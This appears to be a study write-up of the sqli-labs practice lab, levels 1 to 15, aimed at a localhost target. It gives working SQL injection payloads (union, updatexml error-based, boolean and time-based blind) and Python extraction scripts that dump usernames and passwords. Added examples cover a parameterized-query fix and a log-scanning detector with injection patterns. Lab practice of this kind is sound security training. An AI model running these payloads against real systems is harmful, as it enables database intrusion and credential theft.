Dhakkan
less-1
`id=-1' union select 1,2,3` The first step is to close the single quote so that the input is no longer trapped inside the quoted literal.
Why `id=-1'`: the page often echoes only one row, so the first select statement has to return nothing for the row of the second select statement to be echoed.
Two ways to deal with the extra single quote left behind: close it again, or comment it out.
MySQL comment markers: `-- ` (with a trailing space, %20), `#`, `/**/`. A bare `#` is swallowed by the browser, so it has to be written as %23.
You need to know the column count for the union query, i.e. the number of columns the current query returns (we use union-based injection to pull data out of the database; before doing so we must know how many columns the current table query returns, because when `union select` joins two select statements, both must return the same number of columns, otherwise the union is invalid).
Detect the column count with order by: `?id=1' order by 3--+`; the 3 means the third column (`--+` also works as a comment marker).
Make the first query return nothing by giving it an invalid id.
Final goal: extract the admin account and password.
First we need the database name, the admin table name and its column names.
?id=1' order by 3--+ detect the column count
?id=-1' union select 1,user(),database()--+ extract the current database and user; result: security, root@localhost
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ extract the table names
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+ extract the column names: username, password
?id=-1' union select 1,group_concat(username),group_concat(password) from security.users--+ extract the admin accounts and passwords
My own understanding: the source code runs a query against one table; we use a union query to attach the data we want to that original query (we have to know how many columns the original table query returns first), then give id an invalid value so that the original row is not displayed, and the display slots now show the data we asked for.
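The two points above (the union row shows only when the first select returns nothing, and both selects must agree on column count) are easiest to see by running the Less-1 query shape against a local database. This is an added example, not code from the write-up or from sqli-labs; it assumes an in-memory sqlite3 table with two constructed rows in place of the lab's MySQL `security.users`, and puts the string-spliced query next to its parameterized fix.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the lab's security.users table
    # (assumption: sqlite3 instead of MySQL; two sample rows, made up here).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return con

def lookup_vulnerable(con, user_id):
    # Same shape as the Less-1 query: the parameter is spliced into the SQL text,
    # so a quote in the input closes the literal and the rest is parsed as SQL.
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return con.execute(sql).fetchall()

def lookup_parameterized(con, user_id):
    # Hardened form: the value is bound as data and never parsed as SQL, so the
    # whole payload is simply compared against the id column as one string.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return con.execute(sql, (user_id,)).fetchall()

def union_column_mismatch_fails(con):
    # The column-count rule from the write-up: a union whose right-hand select
    # returns a different number of columns is rejected by the database.
    try:
        lookup_vulnerable(con, "-1' union select username,password from users-- ")
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    con = make_db()
    payload = "-1' union select 1,group_concat(username),group_concat(password) from users-- "
    print("spliced query:      ", lookup_vulnerable(con, payload))
    print("parameterized query:", lookup_parameterized(con, payload))
    print("column mismatch rejected:", union_column_mismatch_fails(con))
```

With the spliced query the invalid id `-1` yields no row of its own and the union row fills the display slots; the parameterized query returns nothing for the same input because the payload is just a string that matches no id.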
less-2
In less-2 the id is not wrapped in quotes, so there is no quote to close.
?id=-1 union select 1,group_concat(username),group_concat(password) from security.users
less-3
id=1 and id=1" both run without error; id=1' makes the page error, and the message reports a syntax error near `'1'') LIMIT 0,1'`. So the parameter is also wrapped in parentheses, and we close them too.
?id=-1') union select 1,group_concat(username),group_concat(password) from security.users--+
less-4
id=1 and id=1' both run without error; id=1" makes the page error, and the message reports a syntax error near `'"1"") LIMIT 0,1'`. So the parameter is wrapped in parentheses and the single quote has become a double quote.
?id=-1") union select 1,group_concat(username),group_concat(password) from security.users--+
less-5
With id=1 and id=1" the page shows only "You are in…"; with id=1' the page errors.
Error-based injection: deliberately misusing certain functions so that the database error message, which the page prints, carries the function's argument. Precondition: the page displays database errors.
Error-based injection template: ?id=-1' and updatexml(1,concat(0x7e,(),0x7e),1)--+ (the empty parentheses are where the subquery goes)
?id=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+ query the database name
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+ extract the table names
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+ extract the column names
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+ extract the admin accounts and passwords; 0x3a is ":"
The updatexml error message shows at most 32 characters, which is not enough for the whole result, so substr is used to slice it:
?id=-1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),32,64),0x7e),1)--+
My own understanding: wrap the query in the updatexml function.
less-6
Close with a double quote.
?id=-1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+
less-7
Close two parentheses and a single quote.
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+
less-8
No error message is displayed; the page has only two states, "You are in…" and blank.
Boolean-based blind injection with a Python script:
import requests

url = 'http://127.0.0.1/sqllabs/Less-8/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):            # position of the character being tested
        for j in range(32, 129):      # printable ASCII range
            payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:   # true branch: the page renders normally
                name = name + chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)
Payload for the table names:
payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) = %d-- " % (i, j)
res = {"id": payload}
Payload for the column names:
payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) = %d-- " % (i, j)
Payload for the admin accounts and passwords:
payload = "1' and ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) = %d-- " % (i, j)
less-9
Whether the input is right or wrong the page shows "You are in…", so boolean-based blind injection is not possible; use time-based blind injection instead:
import time
import requests

url = 'http://127.0.0.1/sqllabs/Less-9/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):            # position of the character being tested
        # binary search over the ASCII range; the invariant is that the
        # character's code lies in [low, high]
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:   # the delay fired: the code is above mid
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:                 # past the end of the string: no more characters
            break
        name = name + chr(mid)
        print(name)

inject_database(url)
Payload for the table names:
payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
Payload for the column names:
payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
Payload for the admin accounts and passwords:
payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
less-10
The difference from less-9 is that `$id` is wrapped in double quotes.
In Python the payload itself contains ", so the string is delimited with single quotes:
payload = '1" and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- ' % (i, mid)
less-11
Parameters are sent via POST.
a' union select group_concat(username),group_concat(password) from security.users#
less-12
Close with a double quote and a parenthesis.
a") union select group_concat(username),group_concat(password) from security.users#
less-13
Error-based injection.
a') and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)# extract the admin accounts and passwords
The updatexml error message shows at most 32 characters, which is not enough for the whole result, so substr is used to slice it:
a') and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),32,64),0x7e),1)#
less-14
Close with a double quote; error-based injection.
a" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)#
less-15
Neither output nor errors are displayed; only the image on the page changes between two states, so use boolean-based blind injection:
import requests

url = 'http://127.0.0.1/sqllabs/Less-15/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):            # position of the character being tested
        for j in range(32, 129):      # printable ASCII range
            headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            data = {"uname": "admin' and ascii(substr(database(), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
            r = requests.post(url, data=data, headers=headers)
            if "flag.jpg" in r.text:   # the "login succeeded" image marks the true branch
                name = name + chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)
Payload for the table names:
data = {"uname": "admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
Payload for the column names:
data = {"uname": "admin' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
Payload for the admin accounts and passwords:
data = {"uname": "admin' and ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
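Every technique in this walkthrough leaves a recognisable footprint in the web server's access log once the query string is URL-decoded (`%27` is the quote, `--+` is the comment, and so on). The following added example, which is not part of the write-up or of sqli-labs, scans a few constructed Apache-style log lines modelled on the lab URLs and labels each flagged request with the technique families seen above; the log lines, paths and family names are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined style, paths modelled on
# the lab URLs in this write-up); not real traffic.
SAMPLE_LOG = """\
127.0.0.1 - - [05/Aug/2024:10:00:01 +0000] "GET /sqllabs/Less-1/?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [05/Aug/2024:10:00:02 +0000] "GET /sqllabs/Less-1/?id=1%27%20order%20by%203--+ HTTP/1.1" 200 512
127.0.0.1 - - [05/Aug/2024:10:00:03 +0000] "GET /sqllabs/Less-1/?id=-1%27%20union%20select%201,user(),database()--+ HTTP/1.1" 200 600
127.0.0.1 - - [05/Aug/2024:10:00:04 +0000] "GET /sqllabs/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+ HTTP/1.1" 200 700
127.0.0.1 - - [05/Aug/2024:10:00:05 +0000] "GET /sqllabs/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E64,sleep(1),0)--%20 HTTP/1.1" 200 650
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# One pattern per technique family used in the walkthrough, matched against the
# URL-decoded parameter value (decoding matters: the payloads arrive as %27, --+).
TECHNIQUES = {
    "column-probe": re.compile(r"order\s+by\s+\d+", re.I),
    "union": re.compile(r"union\s+select", re.I),
    "error-based": re.compile(r"updatexml\s*\(", re.I),
    "char-extraction": re.compile(r"ascii\s*\(\s*substr", re.I),
    "time-blind": re.compile(r"sleep\s*\(", re.I),
    "comment-terminator": re.compile(r"(--\s|#|/\*)"),
}

def classify_value(value):
    """Return the technique families whose pattern appears in one decoded value."""
    return [name for name, rx in TECHNIQUES.items() if rx.search(value)]

def scan_log(text):
    """Return (path, parameter, families) for every request carrying a flagged value."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qs decodes %xx escapes and turns '+' into a space, which is
        # exactly how the server saw the '--+' terminator.
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                found = classify_value(value)
                if found:
                    hits.append((parts.path, param, found))
    return hits

if __name__ == "__main__":
    for path, param, found in scan_log(SAMPLE_LOG):
        print(path, param, ", ".join(found))
```

The plain `?id=1` request produces no hit, while the four probe, union, error-based and time-based requests are each labelled with the families of the payload they carry.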